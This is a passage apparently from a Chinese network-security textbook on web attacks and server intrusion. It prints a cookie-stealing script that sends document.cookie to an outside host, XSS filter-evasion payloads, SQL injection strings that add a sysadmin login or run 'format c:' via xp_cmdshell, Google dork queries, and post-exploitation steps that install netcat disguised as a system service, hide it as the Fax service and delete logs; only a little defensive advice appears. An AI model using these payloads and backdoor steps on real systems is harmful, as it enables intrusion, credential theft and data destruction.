將下面的一段腳本加到您的任一對(duì)外訪問(wèn)頁(yè)面中，就可收集訪問(wèn)用戶的Cookie信息到網(wǎng)站空間中的cookies.txt文件內(nèi)，打開(kāi)該文件后，就可以看到所有用戶的Cookie信息，而這些Cookie信息中很可能就包括著用戶的各個(gè)論壇和網(wǎng)站密碼帳號(hào)。＜script＞window.open（'http://xxx.xxx.xxx.xxx./cookie.asp？msg='+document.cookie） 3.6.2 Cookie攻擊 Cookie利用 Cookie對(duì)黑客來(lái)說(shuō)作用非常巨大，除了修改本地hosts.sam文件以便對(duì)修改的Cookie提交，從而得到一些特殊權(quán)限外，還可能會(huì)有以下的利用。 當(dāng)用戶登陸一個(gè)已經(jīng)訪問(wèn)并且在本機(jī)留下Cookie的站點(diǎn)，使用Http協(xié)議向遠(yuǎn)程主機(jī)發(fā)送一個(gè)GET或是POST請(qǐng)求時(shí)，系統(tǒng)會(huì)將該域名的Cookie和請(qǐng)求一起發(fā)送到本地服務(wù)器中。 下面的就是一個(gè)實(shí)際的請(qǐng)求數(shù)據(jù)過(guò)程抓包: Cookie利用 GET/ring/admin.asp HTTP/1.1 Accept: *.* Accept-Language:zh-cn Accept-Encoding:gzip，deflate User－Agent:Mozilla/4.l（compatible；MSIE 6.0;Windows 98） Host: 61.139.XX.XX Connection: Keep－Alive Cookie:user＝admin；password＝5f5Cb5b9d033044c；ASPSESSIONIDSSTCRACS＝ ODMLKJMCOCJMNJIEDFLELACM 將以上數(shù)據(jù)，重新計(jì)算Cookie長(zhǎng)度，保存為test.txt文件，放在NC同一目錄下。以上Http請(qǐng)求，我們完全可以通過(guò) NC進(jìn)行站外提交，格式如下: nc－vv XX.XX.XX.XX 80 其他用戶一例覽其簽名的帕于頁(yè)面時(shí)，就在并不知情的情況下開(kāi)始加載木馬（因?yàn)榇蜷_(kāi)的窗口寬、高都為0，看不見(jiàn)） XSS 例如，很多論壇不支持html，僅僅支持UBB，使用UBB的標(biāo)簽來(lái)插入一幅圖片，其格式為[img]http:www.huway.com/logo.gif[/img]，提交到后臺(tái)UBB代碼會(huì)轉(zhuǎn)化為html格式＜img src＝http://www.huway.com/logo.gif>，假設(shè)攻擊者在輸入符合 UBB標(biāo)準(zhǔn)的惡意代碼: [img]javascript:alert（'跨站測(cè)試'）；[/img] 提交后前臺(tái)頁(yè)面顯示的內(nèi)容為標(biāo)簽激活了。當(dāng)別的用戶打開(kāi)該頁(yè)面時(shí)就會(huì)彈出對(duì)話框，上面寫(xiě)著“跨站測(cè)試” 內(nèi)容，影響網(wǎng)站的形象和正常使用。更加惡意的攻擊者還會(huì)利用documents.cookie（）;document.write（）;等函數(shù)來(lái)收集用戶Cookie，修改當(dāng)前網(wǎng)頁(yè)，后果更嚴(yán)重。 XSS 更多的Web程序編寫(xiě)者，開(kāi)始對(duì)所有的javascipt等敏感字符進(jìn)行過(guò)濾，一旦在提交內(nèi)容輸入某些特征字符就可能被直接刪除或者被分解成 ja va sc I pt，ja連接，do連接，wr連接，提交后自動(dòng)分為j a，d o，w r，總之使得標(biāo)簽無(wú)法運(yùn)行。而這樣的過(guò)濾仍然不是完美的，只能難倒一小部分人，攻擊者仍然可以利用 ASCII碼或者 Unicode編碼來(lái)重寫(xiě)惡意標(biāo)簽，如: ASCII碼替代: XSS ［imgl＆＃176＆＃93＆＃118＆＃97＆＃115＆＃79rip＆＃106＆＃57documen＆＃115＆＃76write＆＃30＆＃29 哈哈，又被跨站了＆＃29＆＃61＆＃29［/img］ 提交到前臺(tái)解釋為 ＜img src=“javascript:write（’哈哈，又被跨站了’）；”＞ Unicode編碼替代: ％3Cscript％3Ealert（’XSS’）％3C/script％3E 提交到前臺(tái)解釋為 ＜Scritpt＞alert（'XSS測(cè)試’） XFS Cross Frame Script也叫 XFS，它是 Cross Site Scirpt后一個(gè)新的盜取用戶資料的方法。 （1）首先，舉一個(gè)簡(jiǎn)單的例子來(lái)幫助讀者理解什么是 Cross Frame Script？ 把下面的這段HTML代碼另存為一個(gè)html文件，然后用IE測(cè)覽器打開(kāi)。 XFS 當(dāng)用戶在百度的搜索框內(nèi)輸入字符時(shí)，會(huì)發(fā)現(xiàn)左下角的狀態(tài)欄上出現(xiàn)了剛才輸入的字符。稍微有編程技術(shù)的人，完全可以將剛才用戶輸入的資料發(fā)送到指定服務(wù)器進(jìn)行收集。 （2）Cross Frame Script原理。利用測(cè)覽器允許框架（frame）跨站包含其他頁(yè)面的漏洞，在主框架的代碼中加入Script，監(jiān)視、盜取用戶輸入。 （3）Cross Frame Script危害。一個(gè)惡意的站點(diǎn)可以通過(guò)用框架頁(yè)面包含真的網(wǎng)銀或在線支付網(wǎng)站進(jìn)行釣魚(yú)，獲取用戶賬號(hào)和密碼，且合法用戶不宜察覺(jué)，因?yàn)樘峁┑姆��?wù)完全正常。 XFS （4）解決方案: 作為用戶，應(yīng)留心瀏覽器地址，不在帶框架頁(yè)面中輸入用戶信息。 作為網(wǎng)站管理員，在頁(yè)面中加入以下javascirpt代碼可以避兔網(wǎng)站被XFS： if（top�。絊elf）{ top.location＝Self.location; } 3.6.5 注入攻擊 SQL注入攻擊可以算是互聯(lián)網(wǎng)上最為流傳最為廣泛的攻擊方式，許多企業(yè)網(wǎng)站先后遭此攻擊。 所謂 SQL注入（SQL Injection），就是利用程序員對(duì)用戶輸入數(shù)據(jù)的合法性檢測(cè)不嚴(yán)或不檢測(cè)的特點(diǎn)，故意從客戶端提交特殊的代碼，從而收集程序及服務(wù)器的信息，查詢數(shù)據(jù)庫(kù)，獲取想得到的資料。了解注入攻擊防范，對(duì)保證Web安全非常重要。攻擊實(shí)現(xiàn) （1）一些網(wǎng)站的管理登陸頁(yè)面對(duì)輸入的用戶名和密碼沒(méi)有做SQL過(guò)濾，導(dǎo)致同站被攻擊。 下面介紹攻擊者如何通過(guò)惡意構(gòu)造然后繞過(guò)登陸驗(yàn)證的。攻擊實(shí)現(xiàn) 假設(shè)一個(gè)沒(méi)有嚴(yán)格過(guò)濾SQL字符的管理登陸界面，其后臺(tái)驗(yàn)證過(guò)程如圖。事實(shí)上黑客并不需要知道用戶名和密碼，那么黑客只需在用戶名里面輸入"'or 1=1--"，密碼任意輸入，提交后，系統(tǒng)認(rèn)為用戶名為空（''）或者（1=1恒成立），后面不執(zhí)行（--），就無(wú)需驗(yàn)證密碼直接進(jìn)入后臺(tái)。攻擊實(shí)現(xiàn) （2）下面的查詢語(yǔ)句在有注入漏洞的服務(wù)器上被惡意利用也會(huì)導(dǎo)致嚴(yán)重后果 String SqlStr＝”Select * from customers where CompanyName like '％"＋textBox1.Text+"%"'; 這樣的字符串連接可能會(huì)帶來(lái)災(zāi)難性的結(jié)果，比如用戶在文本框中輸入: a' or 1=1 那么SqlStr的內(nèi)容就是: select * from customers where CompanyName like '%a' or 1=1 --%' 這樣，整個(gè)customers數(shù)據(jù)表的所有數(shù)據(jù)就會(huì)被全部檢索出來(lái)，因?yàn)?=1永遠(yuǎn)true，而且最后的百分號(hào)和單引號(hào)被短橫杠注釋掉了。攻擊實(shí)現(xiàn) 如果用戶在文本框中輸入: a' EXEC sP_addlogin 'John'，'123'EXEC sP_addsrvrolemember 'John'，'sysadmin'-- 那么SqlStr的內(nèi)容就是: select * from customers where CompanyName like '%a' EXEC sp_addlogin 'John'，'123' EXEC sp_addsrvrolemember'John'，'sysadmin'-- 該語(yǔ)句是在后臺(tái)數(shù)據(jù)庫(kù)中增加一個(gè)用戶John，密碼123，而且是一個(gè)sysadmin賬號(hào)，相當(dāng)于sa的權(quán)限。 如果用戶在文本框中輸入: a'EXEC xp_cmdShell（'format c:/y'）-- 運(yùn)行之后就開(kāi)始格式化C盤(pán)！攻擊實(shí)現(xiàn) （3）PHPSql注入實(shí)例。 CMSware的整站系統(tǒng)被網(wǎng)絡(luò)上廣泛應(yīng)用大多后臺(tái)都是默認(rèn)在/admin/下面，如下圖。 攻擊實(shí)現(xiàn) 黑客通過(guò)搜索關(guān)鍵字或者直接輸入網(wǎng)址，即可進(jìn)入后臺(tái)管理登陸窗口。 ①黑客首先判斷此站是否存在注入漏洞，在用戶名處輸入測(cè)試語(yǔ)句“’or 1=1—”，密碼任意，驗(yàn)證碼見(jiàn)系統(tǒng)顯示。返回Mysql數(shù)據(jù)庫(kù)連接信息。 ②通過(guò)出錯(cuò)信息，構(gòu)造注入語(yǔ)句繞過(guò)驗(yàn)證。 上面的錯(cuò)誤 SQL查詢給黑客提供一條信息，那就是前面輸入的用戶名“‘and=1=1-”沒(méi)有做反斜杠處理而直接被放到u.uName=’$userName‘了，該疏漏提供了sql注入的空間： 在用戶名一欄輸人的內(nèi)容代替[SQL_INJECTION_HERE]的內(nèi)容使之可以正確執(zhí)行并繞過(guò)密碼驗(yàn)證便可達(dá)到注入的目的。 要繞開(kāi)密碼驗(yàn)證條件最直接的方式就是把一個(gè)查詢結(jié)束掉另做一個(gè)查詢，但是由于php中使用 mysql_query()函數(shù)進(jìn)行查詢時(shí)只支持單個(gè)SQL，在單個(gè)SQL里面要執(zhí)行多個(gè)查詢，很自然我們想到了聯(lián)合查詢。MySQL從4.0開(kāi)始就支持聯(lián)合查詢，目前MySQL4的應(yīng)用還是很普及的，我們于是嘗試使用union把查詢條件分割開(kāi)來(lái)，下面語(yǔ)句方括號(hào)中是輸入的內(nèi)容： 上述查詢實(shí)際上是下面3個(gè)查詢語(yǔ)句的組合： 其中第1條和第3條查詢結(jié)果可能為空，第二條則返回所有用戶數(shù)據(jù)結(jié)果。測(cè)試后，很明顯地得到了黑客想要的結(jié)果，繞過(guò)了密碼驗(yàn)證。 將上面［ ］中語(yǔ)句直接輸入到用戶名中，密碼任意，填寫(xiě)圖片代碼，提交即可進(jìn)入管理后臺(tái)。(參見(jiàn)下頁(yè)圖示) (4)通過(guò)注入獲得管理員賬戶密碼。 一個(gè)正常的網(wǎng)址http://localhost/lawjia/show.asp?ID=101，將這個(gè)網(wǎng)址提交到服務(wù)器后，服務(wù)器將進(jìn)行類似 Select * from表名 where字段="&ID的查詢(ID即客戶端提交的參數(shù)，本例是即101），再將查詢結(jié)果返回給客戶端。 當(dāng)某人知道網(wǎng)站管理員帳號(hào)存儲(chǔ)在表login中，其用戶名為admin，如果想知道管理員密碼，此時(shí)他可從客戶端接著提交這樣一個(gè)網(wǎng)址： http://localhost/lol/show.asp?ID=101 and （Select password from login where user_name ='admin')>0 返回的出錯(cuò)信息如下： Microsoft OLE DB Provider for ODBC Drivers（0x80040E07） ［Microsoft］［ODBC SQL Server Driver］［SQL Server］將 varchar值'�。纇uway**a'轉(zhuǎn)換為數(shù)據(jù)類型為int的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。 /lol/show.asp，第27行黑體字部分即為返回密碼。 (5)通過(guò)工具進(jìn)行注入攻擊測(cè)試。 如何判斷一個(gè)網(wǎng)站能否被注入，首先找到注入點(diǎn)，像上面提到的“/show.asp?ID=101”就是一個(gè)注人點(diǎn)，很多新聞系統(tǒng)的新聞顯示頁(yè)面、產(chǎn)品發(fā)布顯示頁(yè)面都有類似ID＝101的標(biāo)志，在ID＝101后面直接輸入and 1=1，如果沒(méi)有出錯(cuò)，仍然返回原先顯示頁(yè)面，這就是一個(gè)注人漏洞，如果返回您的網(wǎng)址不合法，顯然己經(jīng)做了SQL過(guò)濾。 顯然人工猜測(cè)表名是一件麻煩事情，但大多存放管理員的賬戶的表通常為addmin，guan，login這樣簡(jiǎn)單單詞，通過(guò)黑客工具附帶字典，先確定表的名稱，接著猜測(cè)字段，然后窮學(xué)查詢字段第一位、第二、第三位…，直到全部出來(lái)，借助工具，對(duì)有注人漏洞網(wǎng)站攻擊成功率可達(dá)60％以上。 注入工具有NBSI、啊D、Domain等，下面以domain為例。 打開(kāi)domain3．5，選擇SQL注入，將網(wǎng)站注入點(diǎn)輸入到軟件的注入點(diǎn)中，單擊“開(kāi)始檢測(cè)”按鈕，如果可以注入，點(diǎn)擊“猜解表名”。如果對(duì)方表名和列名都比較簡(jiǎn)單，那么一切順利，很快將會(huì)在檢測(cè)結(jié)果里出現(xiàn)列名和內(nèi)容（如下圖，檢測(cè)得到admin表里面的usename和 password的列以及一個(gè)用戶為angle的 MD5加密密碼。） 3.6.6 搜索攻擊 Google是全世界最流行和最強(qiáng)大的搜索引擎。它可以接受預(yù)定義（pre-defined）的命令作為輸入，從而產(chǎn)生意想不到的結(jié)果（百度也一樣，下面選擇Google進(jìn)行舉例，右圖為通過(guò)Google搜索得到某政府網(wǎng)站的遍歷漏洞）。 Google可以面向公眾服務(wù)器進(jìn)行安全掃描--包括Windows、IIS、Apache和 SQLServer。攻擊者能使用它得到服務(wù)器的信息，包含敏感信息的文件和檢測(cè)出“暗藏的”登錄頁(yè)、服務(wù)器日志文件，以及很多其他的內(nèi)容。更為嚴(yán)重的是，通過(guò)Google進(jìn)行漏洞自動(dòng)搜索的技術(shù)已經(jīng)被多個(gè)黑客團(tuán)體所掌握，已經(jīng)出現(xiàn)針對(duì)多款通過(guò)Google漏洞進(jìn)行搜索傳播的病毒。 通過(guò)Google掃描，可能會(huì)直接獲得以下信息： （１）信用卡信息（credit card information)、證件、電話號(hào)碼關(guān)聯(lián)信息，和其他公眾可以通過(guò)Web應(yīng)用程序和數(shù)據(jù)庫(kù)訪問(wèn)的機(jī)密信息。 （２）網(wǎng)絡(luò)攝像頭，一些監(jiān)控企業(yè)內(nèi)部情況的攝像頭都可能被搜索到。 （３）文字處理文檔、電子表格和演示文稿文件（如word、ppt、PDF）。 （４）Outlook Web Access相關(guān)的文件。 （５）默認(rèn)的（通常是不安全的）IIS文件和自定義的IIS錯(cuò)誤信息。 （６）本想隱藏的Web管理后臺(tái)登錄頁(yè)面。 （７）進(jìn)行不屬于你的網(wǎng)絡(luò)的主機(jī)欺詐。 （８）包含敏感信息的新聞帖子。 （９）存在遍歷漏洞的目錄，文本存放的賬戶信息。 攻擊語(yǔ)句示例 現(xiàn)在Google如此智能，黑客們當(dāng)然不會(huì)介意利用它從互聯(lián)網(wǎng)上來(lái)挖掘更多本來(lái)不應(yīng)該讓他們知道的保密和隱私的信息。下面詳細(xì)討論這些技術(shù)，展示黑客們是如何利用Google從網(wǎng)上挖掘信息的，以及如何利用這些信息來(lái)入侵遠(yuǎn)程服務(wù)器。 (1)常用Google黑客搜索攻擊語(yǔ)句： （參見(jiàn)下頁(yè)） （2）利用“index of”與發(fā)來(lái)查找開(kāi)放目錄瀏覽的站點(diǎn)。 一個(gè)開(kāi)放了目錄瀏覽的WEB服務(wù)器意味著任何人都可以像瀏覽通常的本地目錄一樣瀏覽它上面的目錄。這對(duì)黑客來(lái)說(shuō)，是一種非常簡(jiǎn)單的信息搜集方法。試想如果得到了本不應(yīng)該在internet上可見(jiàn)的密碼文件或其他敏感文件，結(jié)果會(huì)怎樣。下面給出了一些能輕松得到敏感信息的例子：（3）利用“inurl”或“allinurl”尋找缺陷站點(diǎn)或服務(wù)器。 ①利用“allinurl ：Winnt/system32/”（不包括引號(hào)）會(huì)列出所有通過(guò)Web可以訪問(wèn)限制目 錄如“system32”的服務(wù)器的鏈接。如果你很幸運(yùn)你就可以訪問(wèn)到“system32”目錄中的 cmd．exe。 一旦你能夠訪問(wèn)“cmd．exe”，就可以執(zhí)行它，服務(wù)器歸你控制了。 ②利用“allinurl：wwwboard/passwd．txt”（不包括引號(hào)）會(huì)列出所有存在“WWWBoard密碼缺陷”的服務(wù)器的鏈接。 ③利用“inurl：bash_history”（不包括引號(hào)）會(huì)列出所有通過(guò)Web可以訪問(wèn)“．bash_history”文件的服務(wù)器的鏈接。這是一個(gè)歷史命令文件。這個(gè)文件包含了管理員執(zhí)行的命令列表，有時(shí)還包含敏感信息例如管理員輸入的密碼。如果這個(gè)文件被泄漏并且包含加密的Unix密碼，就可以用“John The Ripper”來(lái)破解它。 ④利用“inurl：config．txt”（不包括引號(hào)）會(huì)列出所有通過(guò)Web可以訪問(wèn)“config．txt”文件的服務(wù)器的鏈接。這個(gè)文件包含敏感信息，包括管理員密碼的哈希值和數(shù)據(jù)庫(kù)認(rèn)證憑證。 其他類似的組合其他語(yǔ)法的“inurl：”或“allinurl：”用法： （4）利用“intitle”或“allintitle”尋找缺陷站點(diǎn)或服務(wù)器。 ①利用［allintitle：“index of／root”］（不包括括號(hào)）會(huì)列出所有通過(guò) Web可以訪問(wèn)限制目錄如“root”的服務(wù)器的鏈接。該目錄有時(shí)包含可通過(guò)簡(jiǎn)單Web查詢得到的敏感信息。 ②利用［allintitle：“index of/admin”］（不包括括號(hào)）會(huì)列出所有開(kāi)放如“admin”目錄瀏覽權(quán)限的 Web站點(diǎn)列表鏈接。大多數(shù) Web應(yīng)用程序通常使用“admin”來(lái)存儲(chǔ)管理憑證。該目錄有時(shí)包含可通過(guò)簡(jiǎn)單Web查詢得到的敏感信息。 其他類似的組合其他語(yǔ)法的“intitle：”或“allintitle：”用法： 防止搜索引擎攻擊的策略 （1）鞏固服務(wù)器，并將其與外部環(huán)境隔離。 （2）設(shè)置robots.txt文件，禁止Google索引自己的網(wǎng)頁(yè)，具體見(jiàn)Google。 （3）將高度機(jī)密的信息從公眾服務(wù)器上去除。 （4）保證自己的服務(wù)器是安全的。 （5）刪除管理系統(tǒng)的特征字符。 以動(dòng)力3.51為例，頁(yè)面下方的“Powered by:MyPower Ver3.51”和管理登陸頁(yè)面的“后臺(tái)管理頁(yè)面需要屏幕分辨率為1024*768或以上才能達(dá)到最佳瀏覽效果!”就是入侵者判斷文章系統(tǒng)類型的依據(jù)之一。如果有可能，還可以把特征文件名改掉，如顯示文章的Article_show.asp，可以在Deamweaver里面，用全站替換的方法，改成Shownews.asp之類的名字，進(jìn)一步干擾人侵者的判斷。 3.7 黑客攻擊的思路 假設(shè)某黑客想人侵某企業(yè)網(wǎng)絡(luò)中心一臺(tái)Win2000的Web服務(wù)器，入侵的目標(biāo)為拿到”Win2000的管理員賬戶或者修改網(wǎng)站首頁(yè)。他可能的攻擊思路流程大致如右圖所示。 3.7.1 信息收集 信息收集通常有以下一些方法： （1）從一些社會(huì)信息入手； （2）找到網(wǎng)絡(luò)地址范圍； （3）找到關(guān)鍵的機(jī)器地址； （4）找到開(kāi)放端口和入口點(diǎn)； （5）找到系統(tǒng)的制造商和版本； …… 信息收集又分為社會(huì)工程和技術(shù)手段收集。社會(huì)工程學(xué) （１）通過(guò)一些公開(kāi)的信息，如辦公室電話號(hào)碼、管理員生日、姓氏姓名、家庭電話，來(lái)嘗試弱口令，通過(guò)搜索引擎來(lái)了解目標(biāo)網(wǎng)絡(luò)結(jié)構(gòu)、關(guān)于主機(jī)更詳細(xì)的信息，雖然幾率很小，至今仍會(huì)有管理員犯一些經(jīng)典的錯(cuò)誤，例如某高能所將自己網(wǎng)絡(luò)改進(jìn)方案放之網(wǎng)上，詳細(xì)到每臺(tái)設(shè)備的地址配置，為攻擊者留下可乘之機(jī)。 （2）如果以上嘗試失敗，可能會(huì)通過(guò)各種途徑獲得管理員及內(nèi)部人員的信任，例如網(wǎng)絡(luò)聊天，然后發(fā)送加殼木馬軟件或者鍵盤(pán)記錄工具。如一段時(shí)間熟悉之后，他可能會(huì)利用MS04-028漏洞利用工具將自己的照片幫定一個(gè)木馬，然后將之將之傳到網(wǎng)上，同時(shí)附一個(gè)http://www.xxx.com/me.jpg的圖片地址，管理員一看是一個(gè)JPG的后綴，確信是一張圖片，一旦通過(guò)IE打開(kāi)，木馬就會(huì)載入執(zhí)行。 （3）如果管理員已經(jīng)給系統(tǒng)打了補(bǔ)丁，MS04-028漏洞無(wú)法利用。攻擊者可能通過(guò)協(xié)助其解決技術(shù)問(wèn)題，幫助其測(cè)試軟件、交朋友等名義，能夠直接有機(jī)會(huì)進(jìn)入網(wǎng)絡(luò)機(jī)房。進(jìn)入機(jī)房利用查看服務(wù)器機(jī)會(huì)，可以開(kāi)設(shè)一隱藏賬戶（新開(kāi)一賬戶或者激活Guest賬戶都容易被發(fā)覺(jué)，如何建一隱藏賬戶見(jiàn)相關(guān)資料）。 如果時(shí)間足夠，直接登陸機(jī)器或通過(guò)網(wǎng)上鄰居破解服務(wù)器Sam庫(kù)得到管理員賬戶和密碼也是不錯(cuò)的選擇，下載Sam庫(kù)破解工具LC4（或者LC5），直接破解管理員當(dāng)前賬戶。如果10位以下純數(shù)字密碼，LC4有能力在1小時(shí)內(nèi)破解完成。 （4）也可能通過(guò)查找最新的漏洞庫(kù)去反查具有漏洞的主機(jī)，再實(shí)施攻擊。 技術(shù)手段收集 攻擊者通過(guò)Windows自帶命令也可以收集很多對(duì)攻擊有利的信息。如 DNS＆nslookup，Ping＆Traceroute，Whois等。 3.7.2 端口掃描 通過(guò)前一節(jié)基本的信息收集，黑客可能已經(jīng)獲得攻擊對(duì)象的IP地址、網(wǎng)絡(luò)結(jié)構(gòu)、操作系統(tǒng)系統(tǒng)等信息，接著可以針對(duì)性地進(jìn)行漏洞掃描。 常用掃描軟件 掃描軟件有 SSS（Shadow Security Scanner），Nmap、Xsan、Superscan，以及國(guó)產(chǎn)流光等，SSS是俄羅斯的一套非常專業(yè)的安全漏洞掃描軟件，能夠掃描目標(biāo)服務(wù)器上的各種漏洞，包括很多漏洞掃描、端口掃描、操作系統(tǒng)檢測(cè)、賬號(hào)掃描等等，而且漏洞數(shù)據(jù)可以隨時(shí)更新。 掃描遠(yuǎn)程主機(jī) 開(kāi)放端口掃描：通過(guò)開(kāi)放哪些端口判斷主機(jī)開(kāi)放哪些服務(wù)。 操作系統(tǒng)識(shí)別：SSS本身就提供了強(qiáng)大的操作系統(tǒng)識(shí)別能力，也可以使用其他工具進(jìn)行主機(jī)操作系統(tǒng)檢測(cè)。 主機(jī)漏洞分析：SSS可對(duì)遠(yuǎn)程主機(jī)進(jìn)行漏洞檢測(cè)分析，這更方便了黑客了解遠(yuǎn)程主機(jī)的狀態(tài)，選擇合適的攻擊入口點(diǎn)，進(jìn)行遠(yuǎn)程入侵。 3.7.3 漏洞利用 由于SSS本身只是一個(gè)漏洞掃描軟件，針對(duì)漏洞本身不帶有任何利用或者攻擊功能。攻擊者對(duì)于已知漏洞知道如何實(shí)施滲透的，可以直接滲透。對(duì)于不熟悉的漏洞，則必須找出相應(yīng)的漏洞利用工具或者利用方法。 攻擊者通過(guò) Google，Baidu或者一些黑客網(wǎng)站的漏洞引擎去搜索“漏洞關(guān)鍵字符”＋“利用”或“攻擊”去尋找相關(guān)入侵技術(shù)文檔或者工具，另外通過(guò)己知的漏洞的一些操作系統(tǒng)、服務(wù)、應(yīng)用程序的特征關(guān)鍵字，去搜索更多的目標(biāo)機(jī)器。 3.7.4 攻擊階段在掃描過(guò)漏洞之后，進(jìn)入攻擊階段，根據(jù)掃描結(jié)果采用的攻擊方法也不一樣，舉例如下： （1）如攻擊者通過(guò)掃描得到系統(tǒng)存在IDQ漏洞，那么攻擊者通過(guò)搜索“IDQ溢出下載”，就能搜索到IDQ over這樣的工具。具體過(guò)程見(jiàn)3.2節(jié)的“ida＆idq緩沖區(qū)溢出漏洞”攻擊實(shí)現(xiàn)，通過(guò)溢出得到 Shell，然后通過(guò) Net use增加管理員賬戶。 （2）如果沒(méi)有溢出漏洞，可以繼續(xù)查看相關(guān)服務(wù)漏洞。如 IIS的 Unicode，可能安裝 ServerU等其他可利用漏洞。如果掃描結(jié)果和個(gè)人經(jīng)驗(yàn)判斷顯示無(wú)任何己知漏洞�？梢钥紤]暴力破解管理員賬戶（如果對(duì)方未作賬戶鎖定或者設(shè)置安全策略），對(duì)Administrator口令實(shí)施強(qiáng)行破解。 如果目標(biāo)主機(jī)是一臺(tái)個(gè)人主機(jī)，絕大部分情況下均使用Administrator帳號(hào)進(jìn)行登陸，且個(gè)人防范意識(shí)較差的話，選擇的密碼一般都較簡(jiǎn)單，如“主機(jī)名”、“11111”、“12345”等簡(jiǎn)單密碼（方便自己的快速登陸）。所以考慮利用NetBIOS會(huì)話服務(wù)（TCP 139）進(jìn)行遠(yuǎn)程密碼猜測(cè)。 這里攻擊者使用NAT（NetBIOS Auditing Tool）進(jìn)行強(qiáng)行破解：構(gòu)造一個(gè)可能的用戶賬戶表，以及簡(jiǎn)單的密碼字典，然后用NAT進(jìn)行破解。 NAT窮舉破解管理員賬戶界面參見(jiàn)下頁(yè)圖示： （NAT窮舉破解管理員賬戶界面） （3）如果系統(tǒng)本身沒(méi)有任何己知漏洞，攻擊者考慮從服務(wù)的應(yīng)用開(kāi)始人手攻擊。尤其Web應(yīng)用漏洞更是頻多，大致攻擊步驟如下（排序不一定代表攻擊順序先后）： ①首先判斷所使用的系統(tǒng)來(lái)源，如論壇的版本號(hào)、新聞系統(tǒng)來(lái)源，主要通過(guò)版權(quán)信息，html源文件（非程序源代碼）的Meta信息，系統(tǒng)注釋說(shuō)明特征字。 ②通過(guò)已知系統(tǒng)特征信息去搜索系統(tǒng)源代碼，下載分析，包括管理后臺(tái)，上傳后臺(tái)，數(shù)據(jù)庫(kù)名稱路徑等。嘗試站外提交、下載數(shù)據(jù)庫(kù)等。 ③如果沒(méi)有找到特征信息，用專門搜索工具(如 NBSI）搜索管理后臺(tái)登陸頁(yè)。管理后臺(tái)上通常有版權(quán)信息。如果沒(méi)有，嘗試在用戶名里輸入“’or1=1-”一類的注入語(yǔ)句。有時(shí)候即使不能繞過(guò)后臺(tái)，也能返回?cái)?shù)據(jù)庫(kù)地址等信息。 ④以上嘗試都沒(méi)有成功，可以嘗試爆庫(kù)（http://xxx．xxx.xx．xx/inc/conn.asp，如果出錯(cuò)信息中可以顯示出數(shù)據(jù)庫(kù)的路徑，就存在這個(gè)漏洞見(jiàn)下圖）或者使用工具注入（如 Domain3.5）。 ⑤如果上述任何嘗試都無(wú)功而返，可以考慮此站任何可以進(jìn)行交互地方如圖像上傳、更改圖像、個(gè)性簽名等處，進(jìn)行抓包，分析提交數(shù)據(jù)，找出上傳漏洞或者XSS漏洞進(jìn)行利用。 ⑥一切攻擊嘗試都無(wú)功而返，說(shuō)明管理員防范技術(shù)很好或者攻擊者的技能不夠，攻擊者不可能入侵每一臺(tái)機(jī)器，但可能會(huì)試圖通過(guò)一些拒絕式服務(wù)攻擊去阻止目標(biāo)系統(tǒng)的正常運(yùn)行。 3.7.5 后攻擊階段 如獲得管理員賬戶或者Webshell，黑客可能會(huì)按以下流程進(jìn)行后攻擊操作： （1）添加隱藏的管理員賬戶。 （2）拷貝后門到目標(biāo)機(jī)器。 （3）啟動(dòng)后門。 （4）修補(bǔ)常見(jiàn)漏洞，避免更多黑客進(jìn)入系統(tǒng)。 （5）將此服務(wù)器作為代理服務(wù)器或者進(jìn)一步入侵與此機(jī)有信任關(guān)系的網(wǎng)絡(luò)。 （6）安裝一些監(jiān)控木馬（記錄銀行賬戶，QQ密碼），或者在 Web服務(wù)器 index里加入隱藏木馬，達(dá)到其他目的（安裝工具條，發(fā)起DDoS，投放AD）。 （7）刪除登陸以及操作日志(％WinDir％\System32\LogFiles）。 利用溢出攻擊，可以直接獲得管理員賬戶，如果通過(guò)Web攻擊，也可以通過(guò)一些Webshell工具以及SQL注入得到或增加管理員賬戶。為了今后更好控制主機(jī)，例如監(jiān)控主機(jī)鍵盤(pán)記錄或者屏幕，或是拷貝Sam庫(kù)回來(lái)破解其他管理員賬戶密碼工具，或通過(guò)遠(yuǎn)程控制工具的控制目標(biāo)服務(wù)器等（例如安裝遠(yuǎn)程控制服務(wù)RAMDIN），我們可以在對(duì)方的服務(wù)器上安裝一個(gè)后門程序。具體步驟如下（假設(shè)后門為NC（Netcat）： ①利用剛剛獲取的 Administrator口令，通過(guò) Net use映射對(duì)方驅(qū)動(dòng)器映射為本機(jī) X盤(pán)，語(yǔ)句為： C:\net use X:\\對(duì)方 IP\C＄“管理員密碼”//USER:“管理員賬戶名” ②然后將netcat主程序nc.exe復(fù)制到目標(biāo)主機(jī)的系統(tǒng)目錄下（便于隱藏），可將程序名稱改為容易迷惑對(duì)方的名字，如rundll32.exe、ddedll32.exe等。 ③木馬拷貝到對(duì)方機(jī)器，并將其安裝執(zhí)行。利用 at計(jì)劃任務(wù)命令遠(yuǎn)程啟動(dòng) NetCat，供遠(yuǎn)程連接使用。另外，再添加每日運(yùn)行計(jì)劃以便日后使用。如果對(duì)方停止計(jì)劃任務(wù)，可用Microsoft的Netsvc強(qiáng)制啟動(dòng)。 at命令語(yǔ)句為:C:\at\\服務(wù) IP 16:24 C:\Nc.exe－install netsvc語(yǔ)句為:C:\ netsvc schedule \\對(duì)方服務(wù)器 IP /start ④如果攻擊者對(duì)開(kāi)啟的服務(wù)的名稱（cmd下net start可以看到當(dāng)前啟動(dòng)的服務(wù)）不滿意，懷疑被管理員發(fā)現(xiàn)，還可以將安裝的服務(wù)名稱改成系統(tǒng)服務(wù)名，如 Fax服務(wù)，這樣隱藏得更加徹底: 首先，將系統(tǒng)的fax服務(wù)給刪除: C:\sc \\對(duì)方 IP delete fax 然后再將NC服務(wù)改名: C:\sc \\對(duì)方 IP config NC displayname＝Fax ⑤對(duì)于web應(yīng)用攻擊，黑客還可在對(duì)方的Index或者Default頁(yè)面中加人0大小窗口的隱藏的＜iframe＞，去加載任何一個(gè)惡意的網(wǎng)頁(yè)，如木馬、Cookie收集網(wǎng)頁(yè)等。也有可能上傳一些Webshell具，準(zhǔn)備隨時(shí)管理被入侵的網(wǎng)站。 ⑥對(duì)于另外一些黑客，可能會(huì)考慮刪除日志（IIS 